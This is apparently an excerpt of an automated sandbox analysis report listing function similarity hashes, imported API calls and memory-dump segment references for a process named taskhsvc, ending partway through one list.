Similarity

API ID: __stack_chk_fail$abort$strrchr
String ID:
API String ID: 797389190-0
Opcode ID: 868b66ec8ccd1ac8100c1541745199957b7f2b5329f4b3ae170c1826f257e3bd
Instruction ID: 04de29d6ec99364229757134cd7be14386c17ee7f3f45a69a25e80394b4c11b7
Opcode Fuzzy Hash: 868b66ec8ccd1ac8100c1541745199957b7f2b5329f4b3ae170c1826f257e3bd
Instruction Fuzzy Hash: 9451AEB4A0524ADFCB00DFA9D585AAEBBF0BF48314F108819E495E7342D738E944DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00EB62A9 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00EB6320
abort.MSVCRT ref: 00EB6375
free.MSVCRT ref: 00EB6448
__stack_chk_fail.LIBSSP-0 ref: 00EB646D

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: abort$__stack_chk_failfree
String ID:
API String ID: 3331017156-0
Opcode ID: 050c41de6d065d8015672302e153251e9736330f58aa32a39e3c70c695349341
Instruction ID: d3bc7545784283ff60df8d3e1d2182fa1cef074573143a573b65fd9696cf9703
Opcode Fuzzy Hash: 050c41de6d065d8015672302e153251e9736330f58aa32a39e3c70c695349341
Instruction Fuzzy Hash: 115194B4A043099FCB04EFA9C5856AEBBF4BF48304F119859E494EB351D738D944DF22

Uniqueness

Uniqueness Score: -1.00%

Function 00E9F6A9 Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

Part of subcall function 00DEF792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00DD6074), ref: 00DEF7B2

Part of subcall function 00E01AED: abort.MSVCRT ref: 00E01B56
Part of subcall function 00E01AED: abort.MSVCRT ref: 00E01B99
Part of subcall function 00E01AED: abort.MSVCRT ref: 00E01BE6
Part of subcall function 00E01AED: strlen.MSVCRT ref: 00E01BF4
Part of subcall function 00E01AED: strlen.MSVCRT ref: 00E01C08
Part of subcall function 00E01AED: strlen.MSVCRT ref: 00E01C26
Part of subcall function 00E01AED: strlen.MSVCRT ref: 00E01C44

Part of subcall function 00EF59C5: abort.MSVCRT ref: 00EF5A21
Part of subcall function 00EF59C5: _stati64.MSVCRT ref: 00EF5A8E
Part of subcall function 00EF59C5: free.MSVCRT ref: 00EF5AA7
Part of subcall function 00EF59C5: strerror.MSVCRT ref: 00EF5AD7
Part of subcall function 00EF59C5: __stack_chk_fail.LIBSSP-0 ref: 00EF5C45

free.MSVCRT ref: 00E9F754
free.MSVCRT ref: 00E9F84F
__stack_chk_fail.LIBSSP-0 ref: 00E9F869

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Memory Dump Source

Source File: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabortstrlen$free$_stati64strerror
String ID:
API String ID: 1053559245-0
Opcode ID: 7379a04e46b0089a24753584cdd5554e53d25f1694cce186439a53d0e8ad70f9
Instruction ID: dc79e9f08b330d021bd166f938da8eaf1bca02d692b1ef549d6ba7727cc60763
Opcode Fuzzy Hash: 7379a04e46b0089a24753584cdd5554e53d25f1694cce186439a53d0e8ad70f9
Instruction Fuzzy Hash: 7441F3B09083568FDB14EFA4D48976EBBF0BB44348F00982DE498EB255D779D884DF52

Uniqueness

Uniqueness Score: -1.00%

Function 00D9A737 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

SetProcessDEPPolicy.KERNEL32 ref: 00D9A762
time.MSVCRT ref: 00D9A77B
__stack_chk_fail.LIBSSP-0 ref: 00D9A93D

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: PolicyProcess__stack_chk_failtime
String ID:
API String ID: 1946266147-0
Opcode ID: 18246aa2ff8c801f0414e22c32a597634e8c89b15e81ec7df77bb379431932ac
Instruction ID: 35cfd44dda93775cb87a83a307f4a4dea0ebefbe16d30f9b4195e413a9a88c29
Opcode Fuzzy Hash: 18246aa2ff8c801f0414e22c32a597634e8c89b15e81ec7df77bb379431932ac
Instruction Fuzzy Hash: 774105B4A082059FCB00FFB8C58966DBBF0BF45354F158928E498AB382D778D941DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00DB33D7 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00DB343E
abort.MSVCRT ref: 00DB3489
free.MSVCRT ref: 00DB34BA

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

__stack_chk_fail.LIBSSP-0 ref: 00DB34D4

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abortstrrchr$free
String ID:
API String ID: 3026730179-0
Opcode ID: e592349c191ac0a134bc4cec0788d69e1812dbd85726151e212d910336047920
Instruction ID: 728b5dc77f41905602712841d98cc1312120338809aa40b0543fbf60d1af24ff
Opcode Fuzzy Hash: e592349c191ac0a134bc4cec0788d69e1812dbd85726151e212d910336047920
Instruction Fuzzy Hash: 93215A70A04246DFCB00EFAAD145AAEB7F0BB44304F05C819E4959B356DB38E945EF61

Uniqueness

Uniqueness Score: -1.00%

Function 00EF888C Relevance: 6.1, APIs: 4, Instructions: 58stringlibraryCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00EF88DC
strcat.MSVCRT ref: 00EF8939
LoadLibraryA.KERNEL32 ref: 00EF894C
__stack_chk_fail.LIBSSP-0 ref: 00EF895C

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
